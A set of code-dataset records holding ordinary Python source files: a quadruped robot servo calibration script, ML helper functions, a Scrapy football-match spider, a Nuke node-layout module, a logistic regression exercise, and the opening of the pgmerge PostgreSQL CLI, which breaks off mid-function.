+{"seq_id":"649228542","text":"import pigpio\nfrom src.HardwareInterface import (\n send_servo_commands,\n initialize_pwm,\n pwm_to_duty_cycle,\n send_servo_command,\n)\nfrom src.PupperConfig import PWMParams, ServoParams\nimport numpy as np\n\n\ndef getMotorName(i, j):\n motor_type = {0: \"Abduction\", 1: \"Inner\", 2: \"Outer\"} # Top # Bottom\n leg_pos = {0: \"Front Right\", 1: \"Front Left\", 2: \"Back Right\", 3: \"Back Left\"}\n final_name = motor_type[i] + \" \" + leg_pos[j]\n return final_name\n\n\ndef getMotorSetPoint(i, j):\n data = [[0, 0, 0, 0], [45, 45, 45, 45], [45, 45, 45, 45]]\n return data[i][j]\n\n\ndef getUserInput(request):\n measured_angle = float(input(request))\n return measured_angle\n\n\ndef degreesToRadians(input_array):\n return np.pi / 180.0 * input_array\n\n\ndef stepUntil(servo_params, pi_board, pwm_params, kValue, i_index, j_index, set_point):\n # returns the (program_angle) once the real angle matches the pre-defined set point\n foundPosition = False\n set_names = [\"horizontal\", \"horizontal\", \"vertical\"]\n\n offset = 0\n\n while not foundPosition:\n aboveOrBelow = str(\n input(\"Is the leg 'above' or 'below' \" + set_names[i_index] + \"? Input: \")\n )\n if aboveOrBelow == \"above\" or aboveOrBelow == \"a\":\n offset += 1.0\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians(set_point + offset),\n i_index,\n j_index,\n )\n elif aboveOrBelow == \"below\" or aboveOrBelow == \"b\":\n offset -= 1.0\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians(set_point + offset),\n i_index,\n j_index,\n )\n elif aboveOrBelow == \"done\" or aboveOrBelow == \"d\":\n foundPosition = True\n print(\"offset: \", offset, \" original: \", set_point)\n\n return offset\n\n\ndef calibrateB(servo_params, pi_board, pwm_params):\n \"\"\"Calibrate the angle offset for the twelve motors on the robot. Note that servo_params is modified in-place.\n Parameters\n ----------\n servo_params : ServoParams\n Servo parameters. This variable is updated in-place.\n pi_board : Pi\n RaspberryPi object.\n pwm_params : PWMParams\n PWMParams object.\n \"\"\"\n\n # Found K value of (11.4)\n kValue = getUserInput(\n \"Please provide a K value (microseconds per degree) for your servos: \"\n )\n servo_params.micros_per_rad = kValue * 180 / np.pi\n\n servo_params.neutral_angle_degrees = np.zeros((3, 4))\n\n for j in range(4):\n for i in range(3):\n # Loop until we're satisfied with the calibration\n completed = False\n while not completed:\n motor_name = getMotorName(i, j)\n print(\"Currently calibrating \" + motor_name + \"...\")\n set_point = getMotorSetPoint(i, j)\n\n # Move servo to set_point angle\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians(set_point),\n i,\n j,\n )\n\n # Adjust the angle using keyboard input until it matches the reference angle\n offset = stepUntil(\n servo_params, pi_board, pwm_params, kValue, i, j, set_point\n )\n print(\"Final offset: \", offset)\n\n # The upper leg link has a different equation because we're calibrating to make it horizontal, not vertical\n if i == 1:\n servo_params.neutral_angle_degrees[i, j] = set_point - offset\n else:\n servo_params.neutral_angle_degrees[i, j] = -(set_point + offset)\n print(\"New beta angle: \", servo_params.neutral_angle_degrees[i, j])\n\n # Send the servo command using the new beta value and check that it's ok\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians([0, 45, -45][i]),\n i,\n j,\n )\n okay = \"\"\n while okay not in [\"yes\", \"no\"]:\n okay = str(\n input(\"Check angle. Are you satisfied? Enter 'yes' or 'no']\")\n )\n completed = okay == \"yes\"\n\n # (real_angle) = s*(program_angle) - (beta)\n # (beta) = s*(program_angle) - (real_angle)\n\n\ndef main():\n \"\"\"Main program\n \"\"\"\n pi_board = pigpio.pi()\n pwm_params = PWMParams()\n servo_params = ServoParams()\n initialize_pwm(pi_board, pwm_params)\n\n calibrateB(servo_params, pi_board, pwm_params)\n print(\"Calibrated neutral angles:\")\n print(servo_params.neutral_angle_degrees)\n \"\"\"\n servo_params.neutral_angle_degrees = np.array(\n [[8, 3, 0, 0], [45, 48, 45, 45], [-50, -38, -45, -45]]\n )\n\n ref_position = np.pi/180.0 * np.array([[0, 0, 0, 0], [0, 0, 45, 45], [-45,-45, -45, -45]])\n send_servo_commands(pi_board, pwm_params, servo_params, ref_position)\n \"\"\"\n\n\nmain()\n\n# self.servo_multipliers = np.array(\n# [[1, 1, 1, 1], [-1, 1, 1, -1], [1, -1, 1, -1]]\n# )\n","sub_path":"calibrate_servos.py","file_name":"calibrate_servos.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"297402865","text":"\"\"\"\nAI Class\n\nUtility functions\n\n\"\"\"\n\ndef load_Boston_housing_data(test_ratio=0.2, feature_ind = None, random_state=0, print_info=False):\n \"\"\"\n Load Boston Dataset from Sklearn.\n \n Args:\n test_ratio(float) : a proportion between train set and test set. Default = 0.2\n feature_ind(list(int)) : a list of index feature to be extracted from the original data set. No indication\n means that all feature is chosen.\n random_state(int) : a seed value for shuffling between values\n print_info(boolean) : True if print the information of data set. Default: False\n \n Returns:\n a tuple of four np.array data sets train_data, test_data, train_targets, test_targets\n \n \"\"\"\n from sklearn.datasets import load_boston\n from sklearn.model_selection import train_test_split\n\n boston_data = load_boston()\n \n if print_info:\n print(boston_data['DESCR'])\n \n if len(feature_ind) > 0:\n print(\"Selected original features are %s\" % boston_data.feature_names[feature_ind])\n return train_test_split(boston_data.data[:, feature_ind], \\\n boston_data.target, \\\n test_size=test_ratio, \\\n random_state=random_state)\n else:\n print(\"All original features are selected\")\n return train_test_split(boston_data.data, \\\n boston_data.target, \\\n test_size=test_ratio, \\\n random_state=random_state)\n\ndef timing(function, *args):\n \"\"\"\n A function measured an amount of time to run a program\n \"\"\"\n import time\n\n start = time.time()\n function(*args)\n end = time.time()\n return start, end\n\ndef scatter_plot(X, y, title=\"Scatter Plot\", x_label=\"Name of feature\", y_label=\"Name of targets\"):\n \"\"\"\n A function to draw a scatter plot \n \n Args:\n X(np.array) : Instances/ Examples/ Features/ Data\n y(np.array) : Targets\n title (str) : Title of a plot\n x_label (str) : Name of x label\n y_label (str) : Name of y label\n \n Returns:\n an visualization exported as an PNG image.\n \"\"\"\n import matplotlib.pyplot as plt\n\n plt.title(title)\n plt.scatter(X, y)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n plt.show()\n plt.close()\n\nfrom seaborn import pairplot\n\n\n","sub_path":"VietAI/Code/Linear Regression/utils_function.py","file_name":"utils_function.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"34533282","text":"import scrapy\nfrom datetime import datetime\nfrom kspider.items import MatchItem\n\n\nclass MatchSpider(scrapy.Spider):\n name = \"matches\"\n\n def start_requests(self):\n yield scrapy.Request('https://www.kicker.de/{}/spieltag/{}/{}'.format(self.league, self.season, self.start))\n\n def parse(self, response):\n\n for match in response.css('.kick__v100-gameList__gameRow'):\n matchURL = match.css(\n '.kick__v100-gameList__gameRow__stateCell a::attr(href)').get()\n if matchURL is not None:\n kickID = matchURL.split('/')[1]\n yield response.follow('/{}/spielinfo/'.format(kickID), callback=self.parseSpielinfo)\n\n if self.recursive:\n for a in response.css('.kick__pagination__cell-go-forward a'):\n yield response.follow(a, callback=self.parse)\n\n def parseSpielinfo(self, response):\n\n def extract_with_css(query):\n datapoint = response.css(query).get(default='').strip()\n if datapoint == \"-\":\n return \"\"\n return datapoint\n\n m = MatchItem()\n\n stadion = response.css('.kick__gameinfo__item--game-preview '\n ':nth-child(3) p::text').getall()\n if len(stadion) > 1:\n m['stadium'] = \" \".join(stadion[1].strip().split())\n else:\n m['stadium'] = ''\n m['matchID'] = response.url.split('/')[-3]\n\n datestring = extract_with_css('.kick__gameinfo__item--game-preview '\n ':nth-child(2) p::text')\n try:\n date = datetime.strptime(datestring, '%d.%m.%Y, %H:%M')\n except:\n try:\n date = datetime.strptime(datestring, '%d.%m.%Y')\n except:\n date = None\n m['datetime'] = date\n m['league'] = self.league\n m['season'] = self.season\n m['matchday'] = extract_with_css('.kick__v100-scoreboardInfo a::text')\n m['homeTeam'] = extract_with_css(\n 'div.kick__v100-gameCell__team__name:nth-child(1)::text')\n m['awayTeam'] = extract_with_css(\n 'div.kick__v100-gameCell__team__name:nth-child(2)::text')\n m['homeGoals'] = extract_with_css(\n 'div.kick__v100-scoreBoard div:nth-child(1) div:nth-child(1)::text')\n m['awayGoals'] = extract_with_css(\n 'div.kick__v100-scoreBoard div:nth-child(1) div:nth-child(3)::text')\n m['referee'] = extract_with_css('.kick__gameinfo__person a::text')\n m['attendance'] = extract_with_css(\n '.kick__gameinfo__item--game-preview .kick__tabular-nums p::text')\n\n yield m\n","sub_path":"kspider/spiders/matches.py","file_name":"matches.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"421583801","text":"# -*- coding=UTF-8 -*-\n\"\"\"Orgnize nodes layout. \"\"\"\nimport random\n\nimport nuke\n\nfrom wlf.progress import Progress, CancelledError\n\nfrom node import get_upstream_nodes\n\n__version__ = '0.5.1'\n\n\ndef autoplace(nodes=None, recursive=False):\n \"\"\"Auto place nodes.\"\"\"\n if not nodes:\n nodes = nuke.allNodes()\n elif isinstance(nodes, nuke.Node):\n nodes = [nodes]\n if recursive:\n nodes = get_upstream_nodes(nodes).union(nodes)\n nodes = Nodes(nodes)\n\n xpos, bottom = nodes.xpos, nodes.bottom\n try:\n nodes.autoplace()\n except CancelledError:\n nuke.Undo.cancel()\n print('用户取消自动摆放')\n return\n if nodes != nuke.allNodes():\n nodes.xpos, nodes.bottom = xpos, bottom\n\n\ndef is_node_inside(node, backdrop):\n \"\"\"Returns true if node geometry is inside backdropNode otherwise returns false\"\"\"\n topleft_node = [node.xpos(), node.ypos()]\n topleft_backdrop = [backdrop.xpos(), backdrop.ypos()]\n bottomright_node = [node.xpos() + node.screenWidth(),\n node.ypos() + node.screenHeight()]\n bottomright_backdrop = [\n backdrop.xpos() + backdrop.screenWidth(),\n backdrop.ypos() + backdrop.screenHeight()]\n\n topleft = (topleft_node[0] >= topleft_backdrop[0]) and (\n topleft_node[1] >= topleft_backdrop[1])\n bottomright = (bottomright_node[0] <= bottomright_backdrop[0]) and (\n bottomright_node[1] <= bottomright_backdrop[1])\n\n return topleft and bottomright\n\n\nclass Nodes(list):\n \"\"\"Geometry boder size of @nodes. \"\"\"\n y_gap = 10\n x_gap = 10\n placed_nodes = set()\n\n def __init__(self, nodes=None):\n if nodes is None:\n nodes = []\n if isinstance(nodes, nuke.Node):\n nodes = [nodes]\n if isinstance(nodes, Branches):\n nodes = nodes.nodes\n\n list.__init__(self, nodes)\n\n @property\n def xpos(self):\n \"\"\"The x position. \"\"\"\n return min(n.xpos() for n in self)\n\n @xpos.setter\n def xpos(self, value):\n extend_x = value - self.xpos\n for n in self:\n xpos = n.xpos() + extend_x\n n.setXpos(xpos)\n\n @property\n def ypos(self):\n \"\"\"The y position. \"\"\"\n return min([node.ypos() for node in self])\n\n @ypos.setter\n def ypos(self, value):\n extend_y = value - self.ypos\n for n in self:\n ypos = n.ypos() + extend_y\n n.setYpos(ypos)\n\n @property\n def width(self):\n \"\"\"The total width of all nodes. \"\"\"\n return self.right - self.xpos\n\n @property\n def max_width(self):\n \"\"\"The node width max value in this.\"\"\"\n return max(n.screenWidth() for n in self)\n\n @property\n def height(self):\n \"\"\"The total height of all nodes. \"\"\"\n return self.bottom - self.ypos\n\n @property\n def bottom(self):\n \"\"\"The bottom border of all nodes. \"\"\"\n return max([node.ypos() + node.screenHeight()\n for node in self])\n\n @bottom.setter\n def bottom(self, value):\n extend_y = value - self.bottom\n for n in self:\n ypos = n.ypos() + extend_y\n n.setYpos(ypos)\n\n @property\n def right(self):\n \"\"\"The right border of all nodes. \"\"\"\n return max(n.xpos() + n.screenWidth() for n in self)\n\n @right.setter\n def right(self, value):\n extend_x = value - self.right\n for n in self:\n xpos = n.xpos() + extend_x\n n.setXpos(xpos)\n\n def set_position(self, xpos=None, ypos=None):\n \"\"\"Move nodes to given @xpos, @ypos. \"\"\"\n if xpos:\n self.xpos = xpos\n if ypos:\n self.ypos = ypos\n\n def autoplace(self):\n \"\"\"Auto place nodes.\"\"\"\n backdrops_dict = {n: Nodes(n.getNodes())\n for n in self if n.Class() == 'BackdropNode'}\n\n Nodes.placed_nodes.clear()\n\n for n in self.endnodes():\n branches = Branches(\n n, nodes=list(n for n in self if n not in Nodes.placed_nodes))\n\n branches.autoplace()\n if Nodes.placed_nodes and branches.nodes:\n branches.nodes.xpos = Nodes(Nodes.placed_nodes).right + 20\n Nodes.placed_nodes.update(set(branches.nodes))\n\n left, top, right, bottom = (-10, -80, 10, 10)\n for backdrop, nodes_in_backdrop in backdrops_dict.items():\n if not nodes_in_backdrop:\n continue\n up_nodes = Nodes(n for n in get_upstream_nodes(nodes_in_backdrop)\n if n.ypos() < nodes_in_backdrop.bottom\n and n not in nodes_in_backdrop)\n if up_nodes:\n up_nodes.bottom = nodes_in_backdrop.ypos + top - self.y_gap\n up_nodes.extend(nodes_in_backdrop)\n up_nodes.ypos -= bottom\n\n for backdrop, nodes_in_backdrop in backdrops_dict.items():\n if not nodes_in_backdrop:\n continue\n backdrop.setXYpos(nodes_in_backdrop.xpos + left,\n nodes_in_backdrop.ypos + top)\n backdrop['bdwidth'].setValue(\n nodes_in_backdrop.width + (right - left))\n backdrop['bdheight'].setValue(\n nodes_in_backdrop.height + (bottom - top))\n\n nuke.Root().setModified(True)\n\n def endnodes(self):\n \"\"\"Return Nodes that has no contained downstream founded in given nodes. \"\"\"\n available_nodes = Nodes(\n n for n in self if n.Class() not in ('Viewer',))\n ret = Nodes(n for n in available_nodes\n if all(n not in available_nodes for n in n.dependent(nuke.INPUTS)))\n ret.sort(key=lambda x: len(get_upstream_nodes(x)), reverse=True)\n ret.extend(n for n in self if n not in available_nodes)\n return ret\n\n\nclass Branch(Nodes):\n \"\"\"A branch is a list of connected nodes. (e.g. [node1, node2, ... node_n]). \"\"\"\n depth = 0\n _parent_branch = None\n _parent_nodes = None\n _expanded = None\n big_branch_thershold = 10\n\n def __init__(self, node=None):\n if isinstance(node, nuke.Node):\n node = [node]\n elif node is None:\n node = []\n Nodes.__init__(self, node)\n\n def expand(self, nodes=None):\n \"\"\"Expand self to upstream 1 time, can limit in @nodes. \"\"\"\n\n if self.expanded:\n return False\n ret = Branches()\n nodes = nodes or nuke.allNodes()\n input_nodes = self[-1].dependencies(nuke.INPUTS)\n for index, input_node in enumerate(input_nodes):\n if input_node not in nodes:\n continue\n if index == 0:\n branch = self\n else:\n branch = Branch()\n branch.parent_nodes = Nodes(self[:-1])\n branch.parent_branch = self\n branch.depth = self.depth + len(self)\n branch.append(input_node)\n ret.append(branch)\n return ret\n\n @property\n def expanded(self):\n \"\"\"Return if this branch is expanded to end. \"\"\"\n if not self._expanded:\n startnode = self[-1]\n input_nodes = startnode.dependencies(nuke.INPUTS)\n self._expanded = not bool(input_nodes)\n return self._expanded\n\n def new_nodes(self):\n \"\"\"Return nodes that need to be autoplaced in this branch. \"\"\"\n return Nodes(n for n in self if n not in Branches.placed_nodes)\n\n def base_node(self, length_filter=None):\n \"\"\"Return the base node this branch splitted from. \"\"\"\n if length_filter is None:\n length_filter = self.big_branch_thershold\n ret = self[0]\n branch = self\n while branch:\n if branch.parent_nodes:\n ret = branch.parent_nodes[-1]\n else:\n break\n branch = branch.parent_branch\n if len(branch) >= length_filter:\n break\n return ret\n\n def prev_nodes(self):\n \"\"\"Return previous autoplaced nodes. \"\"\"\n ret = Nodes()\n if self.parent_nodes:\n ret = Nodes(n for n in get_upstream_nodes(self.base_node())\n if n not in self.new_nodes()\n and n in Branches.placed_nodes)\n return ret\n\n def autoplace(self):\n \"\"\"Autoplace nodes in this branch. \"\"\"\n nodes = self.new_nodes()\n if not nodes:\n return\n\n # nuke.zoomToFitSelected()\n # if not nuke.ask(str(self.base_node().name())):\n # raise RuntimeError\n\n # Y-axis.\n ypos = 0\n for n in nodes:\n ypos -= n.screenHeight() + self.y_gap\n n.setYpos(ypos)\n if len(nodes) < self.big_branch_thershold:\n # Place nodes accroding parent.\n if self.parent_nodes:\n nodes.bottom = self.parent_nodes.ypos - self.y_gap\n # Move other nodes up.\n up_nodes = Nodes(n for n in self.prev_nodes()\n if Nodes(n).bottom <= nodes.bottom)\n if up_nodes:\n up_nodes.bottom = nodes.ypos - nodes.y_gap\n elif self.parent_nodes:\n nodes.bottom = self.parent_nodes.ypos - self.y_gap\n\n # X-axis.\n if len(nodes) >= self.big_branch_thershold and Branches.placed_nodes:\n xpos = Nodes(Branches.placed_nodes).right + self.x_gap * 50\n else:\n xpos = 0\n\n if self.parent_nodes:\n left_nodes = Nodes(n for n in self.prev_nodes()\n if n.ypos() >= nodes.ypos\n and Nodes(n).bottom <= nodes.bottom)\n if left_nodes:\n xpos = max([left_nodes.right + self.x_gap, xpos])\n\n if self.parent_nodes:\n xpos = max([Nodes(self.parent_nodes[-1]).right + self.x_gap, xpos])\n for n in nodes:\n n.setXpos(xpos + (nodes.max_width - n.screenWidth()) / 2)\n\n @property\n def parent_nodes(self):\n \"\"\"The nodes branch expand from.\"\"\"\n return self._parent_nodes\n\n @parent_nodes.setter\n def parent_nodes(self, value):\n if not isinstance(value, list):\n raise TypeError('Expected list type. ')\n self._parent_nodes = Nodes(value)\n\n @property\n def parent_branch(self):\n \"\"\"The branch this branch expand from.\"\"\"\n return self._parent_branch\n\n @parent_branch.setter\n def parent_branch(self, value):\n if not isinstance(value, Branch):\n raise TypeError('Expected Branch type. ')\n self._parent_branch = value\n\n def total_length(self):\n \"\"\"Return length of this branch and branched to the start. \"\"\"\n parent_branch = self.parent_branch\n ret = len(self)\n while parent_branch:\n ret += len(parent_branch)\n parent_branch = parent_branch.parent_branch\n return ret\n\n def __str__(self):\n return 'Branch< {} >'.format(' -> '.join(n.name() for n in self))\n\n\nclass Branches(list):\n \"\"\"A branches is a list of branch. (e.g. [branch1, branch2, ... branch_n]). \"\"\"\n placed_nodes = set()\n\n def __init__(self, branches=None, nodes=None):\n if isinstance(branches, nuke.Node):\n branches = [Branch(branches)]\n elif isinstance(branches, Branch):\n branches = [branches]\n elif branches is None:\n branches = []\n self._nodes = nodes or nuke.allNodes()\n list.__init__(self, branches)\n if self:\n self.expand()\n\n # for i in self:\n\n def expand(self):\n \"\"\"Expand all branches to the end. \"\"\"\n not_done = True\n task = Progress('分析结构')\n count = 0\n while not_done:\n task.set(message='向上{}层节点'.format(count))\n count += 1\n not_done = False\n itering = list(self)\n del self[:]\n all_num = len(itering)\n for index, branch in enumerate(itering):\n if count >= 50:\n task.set(index * 100 // all_num)\n expanded = branch.expand(nodes=self._nodes)\n if expanded:\n not_done = True\n self.extend(expanded)\n else:\n self.append(branch)\n self._remove_duplicated()\n tested = set()\n for branch in self:\n for i in tested:\n if i in branch:\n branch.remove(i)\n tested.add(i)\n\n def _remove_duplicated(self):\n for branch in list(self):\n if any(set(branch).issubset(set(i)) for i in list(self) if i is not branch):\n self.remove(branch)\n\n def autoplace(self):\n \"\"\"Auto place branches. \"\"\"\n Branches.placed_nodes.clear()\n for branch in self:\n branch.autoplace()\n Branches.placed_nodes.update(branch)\n\n def __str__(self):\n return 'Branches[ {} ]'.format(', '.join(str(i) for i in self))\n\n def __contains__(self, operand):\n if isinstance(operand, Branch):\n return list.__contains__(self, operand)\n elif isinstance(operand, nuke.Node):\n return any(Branch.__contains__(i, operand) for i in self)\n else:\n raise TypeError\n\n def find(self, node):\n \"\"\"Return first @node contained branch. \"\"\"\n for branch in self:\n if node in branch:\n return branch\n\n @property\n def nodes(self):\n \"\"\"The nodes in this.\"\"\"\n ret = []\n for i in self:\n ret.extend(i)\n ret = set(ret)\n return Nodes(ret)\n\n\ndef create_backdrop(nodes, autoplace_nodes=False):\n '''\n Automatically puts a backdrop behind the selected nodes.\n\n The backdrop will be just big enough to fit all the select nodes in, with room\n at the top for some text in a large font.\n '''\n if autoplace_nodes:\n map(nuke.autoplace, nodes)\n if not nodes:\n return nuke.nodes.BackdropNode()\n nodes = Nodes(nodes)\n\n z_order = 0\n selected_backdropnodes = nuke.selectedNodes(\"BackdropNode\")\n # if there are backdropNodes selected put the new one immediately behind the farthest one\n if selected_backdropnodes:\n z_order = min([node.knob(\"z_order\").value()\n for node in selected_backdropnodes]) - 1\n else:\n # otherwise (no backdrop in selection) find the nearest backdrop\n # if exists and set the new one in front of it\n non_selected_backdropnodes = nuke.allNodes(\"BackdropNode\")\n for non_backdrop in nodes:\n for backdrop in non_selected_backdropnodes:\n if is_node_inside(non_backdrop, backdrop):\n z_order = max(z_order, backdrop.knob(\"z_order\").value() + 1)\n\n # Expand the bounds to leave a little border. Elements are offsets for left,\n # top, right and bottom edges respectively\n left, top, right, bottom = (-10, -80, 10, 10)\n\n n = nuke.nodes.BackdropNode(xpos=nodes.xpos + left,\n bdwidth=nodes.width + (right - left),\n ypos=nodes.ypos + top,\n bdheight=nodes.height + (bottom - top),\n tile_color=int(\n (random.random() * (16 - 10))) + 10,\n note_font_size=42,\n z_order=z_order)\n\n return n\n","sub_path":"lib/orgnize.py","file_name":"orgnize.py","file_ext":"py","file_size_in_byte":15526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"316340482","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\nimport os\n\n#implementing zigmoid function\ndef sigmoid(z):\n rtn = 1 / (1 + np.exp(-1 * z));\n return rtn;\n\ndef visualizaSigmoid():\n nums = np.arange(-10,10,step=1);\n fig , ax = plt.subplots(figsize=(12,8));\n ax.plot(nums,sigmoid(nums),'r');\n\n\n plt.show()\n\ndef cost(theta,X,y,lam = 0):\n theta = np.matrix(theta);\n X = np.matrix(X);\n y = np.matrix(y);\n\n first = np.multiply(-y,np.log(sigmoid(X*theta.T)));\n second = np.multiply((1-y),np.log(1 - sigmoid(X*theta.T)))\n\n reg = (lam / 2 * len(X)) * np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n return np.sum(first - second) / (len(X)) + reg\n\ndef gradient(theta, X,y, lam = 0):\n theta= np.matrix(theta);\n X = np.matrix(X);\n y = np.matrix(y);\n\n reval = theta.ravel()\n parameters =int(reval.shape[1]);\n grad = np.zeros(parameters);\n\n sig = sigmoid(X * theta.T);\n error = sig - y;\n\n for i in range(parameters):\n term = np.multiply(error, X[:,i]);\n\n if ( i == 0):\n grad[i] = np.sum(term)/len(X);\n else:\n grad[i] = (np.sum(term)/ len(X)) + ((lam/len(X)) * theta[:,i]);\n\n\n return grad;\n\ndef predict(theta, X):\n probability = sigmoid(X * theta.T)\n return [1 if x >= 0.5 else 0 for x in probability]\n\ndef constructedFeatures(data2):\n degree = 5;\n x1 = data2['Test 1'];\n x2 = data2['Test 2'];\n\n data2.insert(data2.shape[1], 'Ones', 1);\n\n for i in range(1,degree):\n for j in range(0, i):\n data2['F' + str(i) + str(j)] = np.power(x1,i-j) * np.power(x2,j);\n\n data2.drop('Test 1', axis = 1, inplace = True);\n data2.drop('Test 2', axis = 1, inplace = True);\n\n return data2;\n \ndef ex2data1():\n path = os.getcwd() +'\\DATA\\ex2data1.txt'\n data = pd.read_csv(path,header = None,names=['Exam 1','Exam 2','Admitted'])\n\n positive = data[data['Admitted'].isin([1])]\n negative = data[data['Admitted'].isin([0])]\n\n fig, ax = plt.subplots(figsize=(12, 8))\n ax.scatter(positive['Exam 1'], positive['Exam 2'], s=50, c='b', marker='o', label='Admitted')\n ax.scatter(negative['Exam 1'], negative['Exam 2'], s=50, c='r', marker='x', label='Not Admitted')\n ax.legend();\n ax.set_xlabel('Exam 1 Score');\n ax.set_ylabel('Exam 2 Score');\n\n #add ones column to X:\n data.insert(0,'Ones',1,True);\n\n #set X (training) and y (target)\n cols = data.shape[1];\n X=data.iloc[:,0:cols-1];\n y=data.iloc[:,cols-1:cols];\n\n #convert to numpy arrays and init theta:\n X = np.array(X);\n y = np.array(y);\n theta = np.zeros(3);\n\n\n result = opt.fmin_tnc(func=cost, x0 =theta,fprime=gradient,args=(X,y));\n print(cost(result[0],X,y));\n\n theta_min = np.matrix(result[0]);\n predictions = predict(theta_min, X)\n correct = predictions == y;\n accuracy = (sum(map(int, correct)) % len(correct));\n print ('accuracy = {0}%'.format(accuracy));\n\ndef ex2data2():\n path = os.getcwd() + '\\data\\ex2data2.txt';\n data2 = pd.read_csv(path, header=None, names=['Test 1', 'Test 2', 'Accepted']);\n\n positive = data2[data2['Accepted'].isin([1])];\n negative = data2[data2['Accepted'].isin({0})];\n\n fig, ax = plt.subplots(figsize=(12, 8))\n ax.scatter(positive['Test 1'], positive['Test 2'], s=50, c='b', marker='o', label='Accepted');\n ax.scatter(negative['Test 1'], negative['Test 2'], s=50, c='r', marker='x', label='Rejected');\n\n ax.legend();\n\n ax.set_xlabel('Test 1 Score');\n ax.set_ylabel('Test 2 Score');\n\n data2 = constructedFeatures(data2);\n\n # set X and y (remember from above that we moved the label to column 0)\n cols = data2.shape[1]\n X2 = data2.iloc[:, 1:cols]\n y2 = data2.iloc[:, 0:1]\n\n # convert to numpy arrays and initalize the parameter array theta\n X2 = np.array(X2.values)\n y2 = np.array(y2.values)\n theta2 = np.zeros(11)\n\n lam = 1\n\n cst = cost(theta=theta2,X=X2,y=y2,lam = lam);\n\n reg = gradient(theta2, X2, y2, lam);\n\n #opt.fmin_tnc(func=cost, x0 =theta,fprime=gradient,args=(X,y));\n result2 = opt.fmin_tnc(func=cost, x0=theta2,fprime =gradient,args=(X2,y2,lam));\n\n theta_min = np.matrix(result2[0])\n predictions = predict(theta_min, X2)\n correct = [1 if ((a == 1 and b == 1) or (a == 0 and b == 0)) else 0 for (a, b) in zip(predictions, y2)]\n \n accuracy = (sum(map(int, correct)) % len(correct))\n\n print('accuracy = {0}%'.format(accuracy))\n\n\n#Logistic Regression\ndef runLR():\n ex2data2();\n ","sub_path":"ML-Python/ML-Python/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"489913140","text":"#!/usr/bin/env python3\n\"\"\"\npgmerge - a PostgreSQL data import and merge utility\n\nCopyright 2018-2020 Simon Muller (samullers@gmail.com)\n\"\"\"\nimport os\nimport re\nimport sys\nimport copy\nimport errno\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nimport click\nimport sqlalchemy\nfrom appdirs import user_log_dir\n\nfrom .utils import decorate, NoExceptionFormatter, only_file_stem\nfrom .db_config import load_config_for_tables, \\\n validate_table_configs_with_schema, \\\n retrieve_password, generate_url, \\\n ConfigInvalidException\nfrom . import db_graph, db_import, db_export, db_inspect, __version__\n\nAPP_NAME = \"pgmerge\"\nLOG_FILE = os.path.join(user_log_dir(APP_NAME, appauthor=False), \"out.log\")\n\nlog = logging.getLogger()\n\n\ndef setup_logging(verbose=False): # pragma: no cover\n log_dir = os.path.dirname(LOG_FILE)\n try:\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n max_total_size = 1024 * 1024\n file_count = 2\n file_handler = RotatingFileHandler(LOG_FILE, mode='a', maxBytes=max_total_size / file_count,\n backupCount=file_count - 1, encoding=None, delay=0)\n except OSError as err:\n if err.errno == errno.EACCES:\n print('WARN: No permissions to create logging directory or file: ' + LOG_FILE)\n return\n raise err\n\n file_handler.setFormatter(\n logging.Formatter(\"[%(asctime)s] %(name)-10.10s %(threadName)-12.12s %(levelname)-8.8s %(message)s\"))\n file_handler.setLevel(logging.INFO)\n\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(\n NoExceptionFormatter(\"%(levelname)s: %(message)s\"))\n stream_handler.setLevel(logging.WARN)\n # Get the root logger to setup logging for all other modules\n log.addHandler(file_handler)\n log.addHandler(stream_handler)\n # Set the root level to lowest detail otherwise it's never passed on to handlers or other loggers\n log.setLevel(logging.DEBUG)\n # Example of separately controlling log level of imported modules\n # logging.getLogger(db_export.__name__).setLevel(logging.WARN)\n if verbose:\n file_handler.setLevel(logging.DEBUG)\n stream_handler.setLevel(logging.DEBUG)\n\n\ndef find_and_warn_about_cycles(table_graph, dest_tables):\n def print_message(msg):\n print(msg)\n print(\"Import might require the --disable-foreign-keys option.\")\n print()\n\n simple_cycles = db_graph.get_cycles(table_graph)\n\n relevant_cycles = [cycle for cycle in simple_cycles if len(cycle) > 1 if set(cycle).issubset(set(dest_tables))]\n if len(relevant_cycles) > 0:\n print_message(\"Table dependencies contain cycles that could prevent import:\\n\\t{}\"\n .format(relevant_cycles))\n return True\n\n self_references = [table for cycle in simple_cycles if len(cycle) == 1 for table in cycle]\n relevant_tables = [table for table in self_references if table in dest_tables]\n if len(relevant_tables) > 0:\n print_message(\"Self-referencing tables found that could prevent import: {}\"\n .format(', '.join(sorted(relevant_tables))))\n return True\n\n return False\n\n\ndef get_and_warn_about_any_unknown_tables(import_files, dest_tables, schema_tables):\n unknown_tables = set(dest_tables).difference(set(schema_tables))\n if len(unknown_tables) > 0:\n print(\"Skipping files for unknown tables:\")\n for table in unknown_tables:\n idx = dest_tables.index(table)\n print(\"\\t%s: %s\" % (table, import_files[idx]))\n del dest_tables[idx]\n del import_files[idx]\n print()\n return unknown_tables\n\n\ndef get_table_name_with_file(file_name, table_name):\n file_stem = only_file_stem(file_name)\n if file_stem == table_name:\n return table_name\n return '{} [{}]'.format(table_name, file_stem)\n\n\ndef import_all_new(connection, inspector, schema, import_files, dest_tables, config_per_table=None,\n 